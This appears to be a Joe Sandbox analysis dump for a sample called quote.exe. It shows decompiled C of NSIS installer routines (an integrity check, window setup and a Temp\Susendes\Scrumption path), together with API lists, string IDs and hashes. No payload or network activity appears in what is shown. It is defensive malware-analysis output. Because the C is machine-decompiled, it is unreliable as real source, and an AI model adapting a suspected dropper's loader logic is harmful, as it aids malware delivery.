                                                                                      				_t86 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Susendes\\Scrumption";
                                                                                      				 *0x434fa0 =  *0x434f1c & 0x00000020;
                                                                                      				 *0x434fbc = 0x10000;
                                                                                      				if(E00405DEE(_t90, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Susendes\\Scrumption") != 0) {
                                                                                      					L16:
                                                                                      					if(E00405DEE(_t98, _t86) == 0) {
                                                                                      						E0040644E(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
                                                                                      					}
                                                                                      					_t30 = LoadImageW( *0x434f00, 0x67, 1, 0, 0, 0x8040); // executed
                                                                                      					 *0x433ee8 = _t30;
                                                                                      					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                                                                      						L21:
                                                                                      						if(E0040140B(0) == 0) {
                                                                                      							_t32 = E00403DB6(_t78, __eflags);
                                                                                      							__eflags =  *0x434fc0;
                                                                                      							if( *0x434fc0 != 0) {
                                                                                      								_t33 = E0040554C(_t32, 0);
                                                                                      								__eflags = _t33;
                                                                                      								if(_t33 == 0) {
                                                                                      									E0040140B(1);
                                                                                      									goto L33;
                                                                                      								}
                                                                                      								__eflags =  *0x433ecc; // 0x0
                                                                                      								if(__eflags == 0) {
                                                                                      									E0040140B(2);
                                                                                      								}
                                                                                      								goto L22;
                                                                                      							}
                                                                                      							ShowWindow( *0x42d248, 5); // executed
                                                                                      							_t39 = E00406796("RichEd20"); // executed
                                                                                      							__eflags = _t39;
                                                                                      							if(_t39 == 0) {
                                                                                      								E00406796("RichEd32");
                                                                                      							}
                                                                                      							_t87 = L"RichEdit20W";
                                                                                      							_t40 = GetClassInfoW(0, _t87, 0x433ea0);
                                                                                      							__eflags = _t40;
                                                                                      							if(_t40 == 0) {
                                                                                      								GetClassInfoW(0, L"RichEdit", 0x433ea0);
                                                                                      								 *0x433ec4 = _t87;
                                                                                      								RegisterClassW(0x433ea0);
                                                                                      							}
                                                                                      							_t41 =  *0x433ee0; // 0x0
                                                                                      							_t44 = DialogBoxParamW( *0x434f00, _t41 + 0x00000069 & 0x0000ffff, 0, E00403E8E, 0); // executed
                                                                                      							E00403A30(E0040140B(5), 1);
                                                                                      							return _t44;
                                                                                      						}
                                                                                      						L22:
                                                                                      						_t36 = 2;
                                                                                      						return _t36;
                                                                                      					} else {
                                                                                      						_t78 =  *0x434f00;
                                                                                      						 *0x433ea4 = E00401000;
                                                                                      						 *0x433eb0 =  *0x434f00;
                                                                                      						 *0x433eb4 = _t30;
                                                                                      						 *0x433ec4 = 0x40a380;
                                                                                      						if(RegisterClassW(0x433ea0) == 0) {
                                                                                      							L33:
                                                                                      							__eflags = 0;
                                                                                      							return 0;
                                                                                      						}
                                                                                      						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                                                                      						 *0x42d248 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x434f00, 0);
                                                                                      						goto L21;
                                                                                      					}
                                                                                      				} else {
                                                                                      					_t78 =  *(_t82 + 0x48);
                                                                                      					_t92 = _t78;
                                                                                      					if(_t78 == 0) {
                                                                                      						goto L16;
                                                                                      					}
                                                                                      					_t76 = 0x432ea0;
                                                                                      					E004062DF(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x434f58 + _t78 * 2,  *0x434f58 +  *(_t82 + 0x4c) * 2, 0x432ea0, 0);
                                                                                      					_t63 =  *0x432ea0; // 0x43
                                                                                      					if(_t63 == 0) {
                                                                                      						goto L16;
                                                                                      					}
                                                                                      					if(_t63 == 0x22) {
                                                                                      						_t76 = 0x432ea2;
                                                                                      						 *((short*)(E00405D13(0x432ea2, 0x22))) = 0;
                                                                                      					}
                                                                                      					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                                                                      					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                                                                      						L15:
                                                                                      						E00406411(_t86, E00405CE6(_t76));
                                                                                      						goto L16;
                                                                                      					} else {
                                                                                      						_t69 = GetFileAttributesW(_t76);
                                                                                      						if(_t69 == 0xffffffff) {
                                                                                      							L14:
                                                                                      							E00405D32(_t76);
                                                                                      							goto L15;
                                                                                      						}
                                                                                      						_t98 = _t69 & 0x00000010;
                                                                                      						if((_t69 & 0x00000010) != 0) {
                                                                                      							goto L15;
                                                                                      						}
                                                                                      						goto L14;
                                                                                      					}
                                                                                      				}
                                                                                      			}


























                                                                                      0x00403ae6
                                                                                      0x00403aef
                                                                                      0x00403af6
                                                                                      0x00403af8
                                                                                      0x00403b0c
                                                                                      0x00403b1e
                                                                                      0x00403b27
                                                                                      0x00403b30
                                                                                      0x00403b37
                                                                                      0x00403b3c
                                                                                      0x00403b43
                                                                                      0x00403b56
                                                                                      0x00403b56
                                                                                      0x00403b61
                                                                                      0x00403afa
                                                                                      0x00403afa
                                                                                      0x00403b05
                                                                                      0x00403b05
                                                                                      0x00403b66
                                                                                      0x00403b70
                                                                                      0x00403b79
                                                                                      0x00403b7e
                                                                                      0x00403b8f
                                                                                      0x00403c21
                                                                                      0x00403c29
                                                                                      0x00403c32
                                                                                      0x00403c32
                                                                                      0x00403c48
                                                                                      0x00403c4e
                                                                                      0x00403c5c
                                                                                      0x00403cdd
                                                                                      0x00403ce5
                                                                                      0x00403cef
                                                                                      0x00403cf4
                                                                                      0x00403cfa
                                                                                      0x00403d84
                                                                                      0x00403d89
                                                                                      0x00403d8b
                                                                                      0x00403da7
                                                                                      0x00000000
                                                                                      0x00403da7
                                                                                      0x00403d8d
                                                                                      0x00403d93
                                                                                      0x00403d9b
                                                                                      0x00403d9b
                                                                                      0x00000000
                                                                                      0x00403d93
                                                                                      0x00403d08
                                                                                      0x00403d13
                                                                                      0x00403d18
                                                                                      0x00403d1a
                                                                                      0x00403d21
                                                                                      0x00403d21
                                                                                      0x00403d2c
                                                                                      0x00403d34
                                                                                      0x00403d36
                                                                                      0x00403d38
                                                                                      0x00403d41
                                                                                      0x00403d44
                                                                                      0x00403d4a
                                                                                      0x00403d4a
                                                                                      0x00403d50
                                                                                      0x00403d69
                                                                                      0x00403d7a
                                                                                      0x00000000
                                                                                      0x00403d7f
                                                                                      0x00403ce7
                                                                                      0x00403ce9
                                                                                      0x00000000
                                                                                      0x00403c5e
                                                                                      0x00403c5e
                                                                                      0x00403c6a
                                                                                      0x00403c74
                                                                                      0x00403c7a
                                                                                      0x00403c7f
                                                                                      0x00403c8e
                                                                                      0x00403dac
                                                                                      0x00403dac
                                                                                      0x00000000
                                                                                      0x00403dac
                                                                                      0x00403c9d
                                                                                      0x00403cd8
                                                                                      0x00000000
                                                                                      0x00403cd8
                                                                                      0x00403b95
                                                                                      0x00403b95
                                                                                      0x00403b98
                                                                                      0x00403b9a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403ba8
                                                                                      0x00403bba
                                                                                      0x00403bbf
                                                                                      0x00403bc8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403bce
                                                                                      0x00403bd0
                                                                                      0x00403bdd
                                                                                      0x00403bdd
                                                                                      0x00403be6
                                                                                      0x00403bec
                                                                                      0x00403c14
                                                                                      0x00403c1c
                                                                                      0x00000000
                                                                                      0x00403bfe
                                                                                      0x00403bff
                                                                                      0x00403c08
                                                                                      0x00403c0e
                                                                                      0x00403c0f
                                                                                      0x00000000
                                                                                      0x00403c0f
                                                                                      0x00403c0a
                                                                                      0x00403c0c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403c0c
                                                                                      0x00403bec

                                                                                      APIs
                                                                                        • Part of subcall function 00406806: GetModuleHandleA.KERNEL32(?,00000020,?,00403537,0000000B), ref: 00406818
                                                                                        • Part of subcall function 00406806: GetProcAddress.KERNEL32(00000000,?), ref: 00406833
                                                                                      • GetUserDefaultUILanguage.KERNELBASE(00000002,75A33420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\quote.exe" ,00000000), ref: 00403AFA
                                                                                        • Part of subcall function 00406358: wsprintfW.USER32 ref: 00406365
                                                                                      • lstrcatW.KERNEL32(1033,0042D268), ref: 00403B61
                                                                                      • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\Susendes\Scrumption,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,75A33420), ref: 00403BE1
                                                                                      • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\Susendes\Scrumption,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403BF4
                                                                                      • GetFileAttributesW.KERNEL32(Call), ref: 00403BFF
                                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Susendes\Scrumption), ref: 00403C48
                                                                                      • RegisterClassW.USER32(00433EA0), ref: 00403C85
                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C9D
                                                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CD2
                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403D08
                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403D34
                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403D41
                                                                                      • RegisterClassW.USER32(00433EA0), ref: 00403D4A
                                                                                      • DialogBoxParamW.USER32(?,00000000,00403E8E,00000000), ref: 00403D69
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                      • String ID: "C:\Users\user\Desktop\quote.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Susendes\Scrumption$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                      • API String ID: 606308-3244518643
                                                                                      • Opcode ID: b6d7d8a8cdf8beafbbe2f4ef846f242538d17a79dc411b5244a10106e626ad05
                                                                                      • Instruction ID: ef062d508cd4fc62497976b4bc03dd7eae2cd9e8a178e807e7972486bae2ade7
                                                                                      • Opcode Fuzzy Hash: b6d7d8a8cdf8beafbbe2f4ef846f242538d17a79dc411b5244a10106e626ad05
                                                                                      • Instruction Fuzzy Hash: 9A61B8711447006EE320AF66AE46F2B3A6CEBC5B4AF40453FF941B61E1DB7D9901CA2D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 368 403015-403063 GetTickCount GetModuleFileNameW call 405f07 371 403065-40306a 368->371 372 40306f-40309d call 406411 call 405d32 call 406411 GetFileSize 368->372 373 403245-403249 371->373 380 4030a3 372->380 381 403188-403196 call 402fb1 372->381 383 4030a8-4030bf 380->383 388 403198-40319b 381->388 389 4031eb-4031f0 381->389 385 4030c1 383->385 386 4030c3-4030cc call 403467 383->386 385->386 393 4031f2-4031fa call 402fb1 386->393 394 4030d2-4030d9 386->394 391 40319d-4031b5 call 40347d call 403467 388->391 392 4031bf-4031e9 GlobalAlloc call 40347d call 40324c 388->392 389->373 391->389 414 4031b7-4031bd 391->414 392->389 419 4031fc-40320d 392->419 393->389 398 403155-403159 394->398 399 4030db-4030ef call 405ec2 394->399 403 403163-403169 398->403 404 40315b-403162 call 402fb1 398->404 399->403 417 4030f1-4030f8 399->417 410 403178-403180 403->410 411 40316b-403175 call 4068f3 403->411 404->403 410->383 418 403186 410->418 411->410 414->389 414->392 417->403 421 4030fa-403101 417->421 418->381 422 403215-40321a 419->422 423 40320f 419->423 421->403 425 403103-40310a 421->425 424 40321b-403221 422->424 423->422 424->424 426 403223-40323e SetFilePointer call 405ec2 424->426 425->403 427 40310c-403113 425->427 430 403243 426->430 427->403 429 403115-403135 427->429 429->389 431 40313b-40313f 429->431 430->373 432 403141-403145 431->432 433 403147-40314f 431->433 432->418 432->433 433->403 434 403151-403153 433->434 434->403
                                                                                      C-Code - Quality: 80%
                                                                                      			E00403015(void* __eflags, signed int _a4) {
                                                                                      				DWORD* _v8;
                                                                                      				DWORD* _v12;
                                                                                      				void* _v16;
                                                                                      				intOrPtr _v20;
                                                                                      				long _v24;
                                                                                      				intOrPtr _v28;
                                                                                      				intOrPtr _v32;
                                                                                      				intOrPtr _v36;
                                                                                      				intOrPtr _v40;
                                                                                      				signed int _v44;
                                                                                      				long _t43;
                                                                                      				signed int _t50;
                                                                                      				void* _t53;
                                                                                      				void* _t57;
                                                                                      				intOrPtr* _t59;
                                                                                      				long _t60;
                                                                                      				signed int _t65;
                                                                                      				signed int _t70;
                                                                                      				signed int _t71;
                                                                                      				signed int _t77;
                                                                                      				intOrPtr _t80;
                                                                                      				long _t82;
                                                                                      				signed int _t85;
                                                                                      				signed int _t87;
                                                                                      				void* _t89;
                                                                                      				signed int _t90;
                                                                                      				signed int _t93;
                                                                                      				void* _t94;
                                                                                      
                                                                                      				_t82 = 0;
                                                                                      				_v12 = 0;
                                                                                      				_v8 = 0;
                                                                                      				_t43 = GetTickCount();
                                                                                      				_t91 = L"C:\\Users\\Arthur\\Desktop\\quote.exe";
                                                                                      				 *0x434f10 = _t43 + 0x3e8;
                                                                                      				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\quote.exe", 0x400);
                                                                                      				_t89 = E00405F07(_t91, 0x80000000, 3);
                                                                                      				_v16 = _t89;
                                                                                      				 *0x40a018 = _t89;
                                                                                      				if(_t89 == 0xffffffff) {
                                                                                      					return L"Error launching installer";
                                                                                      				}
                                                                                      				_t92 = L"C:\\Users\\Arthur\\Desktop";
                                                                                      				E00406411(L"C:\\Users\\Arthur\\Desktop", _t91);
                                                                                      				E00406411(0x444000, E00405D32(_t92));
                                                                                      				_t50 = GetFileSize(_t89, 0);
                                                                                      				__eflags = _t50;
                                                                                      				 *0x42aa24 = _t50;
                                                                                      				_t93 = _t50;
                                                                                      				if(_t50 <= 0) {
                                                                                      					L24:
                                                                                      					E00402FB1(1);
                                                                                      					__eflags =  *0x434f18 - _t82;
                                                                                      					if( *0x434f18 == _t82) {
                                                                                      						goto L29;
                                                                                      					}
                                                                                      					__eflags = _v8 - _t82;
                                                                                      					if(_v8 == _t82) {
                                                                                      						L28:
                                                                                      						_t53 = GlobalAlloc(0x40, _v24); // executed
                                                                                      						_t94 = _t53;
                                                                                      						E0040347D( *0x434f18 + 0x1c);
                                                                                      						_push(_v24);
                                                                                      						_push(_t94);
                                                                                      						_push(_t82);
                                                                                      						_push(0xffffffff); // executed
                                                                                      						_t57 = E0040324C(); // executed
                                                                                      						__eflags = _t57 - _v24;
                                                                                      						if(_t57 == _v24) {
                                                                                      							__eflags = _v44 & 0x00000001;
                                                                                      							 *0x434f14 = _t94;
                                                                                      							 *0x434f1c =  *_t94;
                                                                                      							if((_v44 & 0x00000001) != 0) {
                                                                                      								 *0x434f20 =  *0x434f20 + 1;
                                                                                      								__eflags =  *0x434f20;
                                                                                      							}
                                                                                      							_t40 = _t94 + 0x44; // 0x44
                                                                                      							_t59 = _t40;
                                                                                      							_t85 = 8;
                                                                                      							do {
                                                                                      								_t59 = _t59 - 8;
                                                                                      								 *_t59 =  *_t59 + _t94;
                                                                                      								_t85 = _t85 - 1;
                                                                                      								__eflags = _t85;
                                                                                      							} while (_t85 != 0);
                                                                                      							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                                                                      							 *(_t94 + 0x3c) = _t60;
                                                                                      							E00405EC2(0x434f40, _t94 + 4, 0x40);
                                                                                      							__eflags = 0;
                                                                                      							return 0;
                                                                                      						}
                                                                                      						goto L29;
                                                                                      					}
                                                                                      					E0040347D( *0x41ea18);
                                                                                      					_t65 = E00403467( &_a4, 4);
                                                                                      					__eflags = _t65;
                                                                                      					if(_t65 == 0) {
                                                                                      						goto L29;
                                                                                      					}
                                                                                      					__eflags = _v12 - _a4;
                                                                                      					if(_v12 != _a4) {
                                                                                      						goto L29;
                                                                                      					}
                                                                                      					goto L28;
                                                                                      				} else {
                                                                                      					do {
                                                                                      						_t90 = _t93;
                                                                                      						asm("sbb eax, eax");
                                                                                      						_t70 = ( ~( *0x434f18) & 0x00007e00) + 0x200;
                                                                                      						__eflags = _t93 - _t70;
                                                                                      						if(_t93 >= _t70) {
                                                                                      							_t90 = _t70;
                                                                                      						}
                                                                                      						_t71 = E00403467(0x416a18, _t90);
                                                                                      						__eflags = _t71;
                                                                                      						if(_t71 == 0) {
                                                                                      							E00402FB1(1);
                                                                                      							L29:
                                                                                      							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                                                      						}
                                                                                      						__eflags =  *0x434f18;
                                                                                      						if( *0x434f18 != 0) {
                                                                                      							__eflags = _a4 & 0x00000002;
                                                                                      							if((_a4 & 0x00000002) == 0) {
                                                                                      								E00402FB1(0);
                                                                                      							}
                                                                                      							goto L20;
                                                                                      						}
                                                                                      						E00405EC2( &_v44, 0x416a18, 0x1c);
                                                                                      						_t77 = _v44;
                                                                                      						__eflags = _t77 & 0xfffffff0;
                                                                                      						if((_t77 & 0xfffffff0) != 0) {
                                                                                      							goto L20;
                                                                                      						}
                                                                                      						__eflags = _v40 - 0xdeadbeef;
                                                                                      						if(_v40 != 0xdeadbeef) {
                                                                                      							goto L20;
                                                                                      						}
                                                                                      						__eflags = _v28 - 0x74736e49;
                                                                                      						if(_v28 != 0x74736e49) {
                                                                                      							goto L20;
                                                                                      						}
                                                                                      						__eflags = _v32 - 0x74666f73;
                                                                                      						if(_v32 != 0x74666f73) {
                                                                                      							goto L20;
                                                                                      						}
                                                                                      						__eflags = _v36 - 0x6c6c754e;
                                                                                      						if(_v36 != 0x6c6c754e) {
                                                                                      							goto L20;
                                                                                      						}
                                                                                      						_a4 = _a4 | _t77;
                                                                                      						_t87 =  *0x41ea18; // 0x2c3b6
                                                                                      						 *0x434fc0 =  *0x434fc0 | _a4 & 0x00000002;
                                                                                      						_t80 = _v20;
                                                                                      						__eflags = _t80 - _t93;
                                                                                      						 *0x434f18 = _t87;
                                                                                      						if(_t80 > _t93) {
                                                                                      							goto L29;
                                                                                      						}
                                                                                      						__eflags = _a4 & 0x00000008;
                                                                                      						if((_a4 & 0x00000008) != 0) {
                                                                                      							L16:
                                                                                      							_v8 = _v8 + 1;
                                                                                      							_t24 = _t80 - 4; // 0x40a2dc
                                                                                      							_t93 = _t24;
                                                                                      							__eflags = _t90 - _t93;
                                                                                      							if(_t90 > _t93) {
                                                                                      								_t90 = _t93;
                                                                                      							}
                                                                                      							goto L20;
                                                                                      						}
                                                                                      						__eflags = _a4 & 0x00000004;
                                                                                      						if((_a4 & 0x00000004) != 0) {
                                                                                      							break;
                                                                                      						}
                                                                                      						goto L16;
                                                                                      						L20:
                                                                                      						__eflags = _t93 -  *0x42aa24; // 0x2cb38
                                                                                      						if(__eflags < 0) {
                                                                                      							_v12 = E004068F3(_v12, 0x416a18, _t90);
                                                                                      						}
                                                                                      						 *0x41ea18 =  *0x41ea18 + _t90;
                                                                                      						_t93 = _t93 - _t90;
                                                                                      						__eflags = _t93;
                                                                                      					} while (_t93 != 0);
                                                                                      					_t82 = 0;
                                                                                      					__eflags = 0;
                                                                                      					goto L24;
                                                                                      				}
                                                                                      			}































                                                                                      0x0040301d
                                                                                      0x00403020
                                                                                      0x00403023
                                                                                      0x00403026
                                                                                      0x0040302c
                                                                                      0x0040303d
                                                                                      0x00403042
                                                                                      0x00403055
                                                                                      0x0040305a
                                                                                      0x0040305d
                                                                                      0x00403063
                                                                                      0x00000000
                                                                                      0x00403065
                                                                                      0x00403070
                                                                                      0x00403076
                                                                                      0x00403087
                                                                                      0x0040308e
                                                                                      0x00403094
                                                                                      0x00403096
                                                                                      0x0040309b
                                                                                      0x0040309d
                                                                                      0x00403188
                                                                                      0x0040318a
                                                                                      0x0040318f
                                                                                      0x00403196
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403198
                                                                                      0x0040319b
                                                                                      0x004031bf
                                                                                      0x004031c4
                                                                                      0x004031ca
                                                                                      0x004031d5
                                                                                      0x004031da
                                                                                      0x004031dd
                                                                                      0x004031de
                                                                                      0x004031df
                                                                                      0x004031e1
                                                                                      0x004031e6
                                                                                      0x004031e9
                                                                                      0x004031fc
                                                                                      0x00403200
                                                                                      0x00403208
                                                                                      0x0040320d
                                                                                      0x0040320f
                                                                                      0x0040320f
                                                                                      0x0040320f
                                                                                      0x00403217
                                                                                      0x00403217
                                                                                      0x0040321a
                                                                                      0x0040321b
                                                                                      0x0040321b
                                                                                      0x0040321e
                                                                                      0x00403220
                                                                                      0x00403220
                                                                                      0x00403220
                                                                                      0x0040322a
                                                                                      0x00403230
                                                                                      0x0040323e
                                                                                      0x00403243
                                                                                      0x00000000
                                                                                      0x00403243
                                                                                      0x00000000
                                                                                      0x004031e9
                                                                                      0x004031a3
                                                                                      0x004031ae
                                                                                      0x004031b3
                                                                                      0x004031b5
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004031ba
                                                                                      0x004031bd
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004030a3
                                                                                      0x004030a8
                                                                                      0x004030ad
                                                                                      0x004030b1
                                                                                      0x004030b8
                                                                                      0x004030bd
                                                                                      0x004030bf
                                                                                      0x004030c1
                                                                                      0x004030c1
                                                                                      0x004030c5
                                                                                      0x004030ca
                                                                                      0x004030cc
                                                                                      0x004031f4
                                                                                      0x004031eb
                                                                                      0x00000000
                                                                                      0x004031eb
                                                                                      0x004030d2
                                                                                      0x004030d9
                                                                                      0x00403155
                                                                                      0x00403159
                                                                                      0x0040315d
                                                                                      0x00403162
                                                                                      0x00000000
                                                                                      0x00403159
                                                                                      0x004030e2
                                                                                      0x004030e7
                                                                                      0x004030ea
                                                                                      0x004030ef
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004030f1
                                                                                      0x004030f8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004030fa
                                                                                      0x00403101
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403103
                                                                                      0x0040310a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040310c
                                                                                      0x00403113
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403115
                                                                                      0x0040311b
                                                                                      0x00403124
                                                                                      0x0040312a
                                                                                      0x0040312d
                                                                                      0x0040312f
                                                                                      0x00403135
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040313b
                                                                                      0x0040313f
                                                                                      0x00403147
                                                                                      0x00403147
                                                                                      0x0040314a
                                                                                      0x0040314a
                                                                                      0x0040314d
                                                                                      0x0040314f
                                                                                      0x00403151
                                                                                      0x00403151
                                                                                      0x00000000
                                                                                      0x0040314f
                                                                                      0x00403141
                                                                                      0x00403145
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403163
                                                                                      0x00403163
                                                                                      0x00403169
                                                                                      0x00403175
                                                                                      0x00403175
                                                                                      0x00403178
                                                                                      0x0040317e
                                                                                      0x0040317e
                                                                                      0x0040317e
                                                                                      0x00403186
                                                                                      0x00403186
                                                                                      0x00000000
                                                                                      0x00403186

                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 00403026
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\quote.exe,00000400,?,00000007,00000009,0000000B), ref: 00403042
                                                                                        • Part of subcall function 00405F07: GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\quote.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405F0B
                                                                                        • Part of subcall function 00405F07: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F2D
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\quote.exe,C:\Users\user\Desktop\quote.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 0040308E
                                                                                      • GlobalAlloc.KERNELBASE(00000040,0000000B,?,00000007,00000009,0000000B), ref: 004031C4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                      • String ID: "C:\Users\user\Desktop\quote.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\quote.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                      • API String ID: 2803837635-1379902672
                                                                                      • Opcode ID: a52360a1b04fecb28cdb34ea46c0a5e0142df37db4d5eb2ecb020a06199e7e0c
                                                                                      • Instruction ID: 352fdba277142773567f3d30b5bba7b1c47688a28dd7517ec43723b707c69b17
                                                                                      • Opcode Fuzzy Hash: a52360a1b04fecb28cdb34ea46c0a5e0142df37db4d5eb2ecb020a06199e7e0c
                                                                                      • Instruction Fuzzy Hash: CF51D331904204ABDB109FA5DD85B9E7EACEB48356F24803BF910BA2D1C77C9F418B9D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
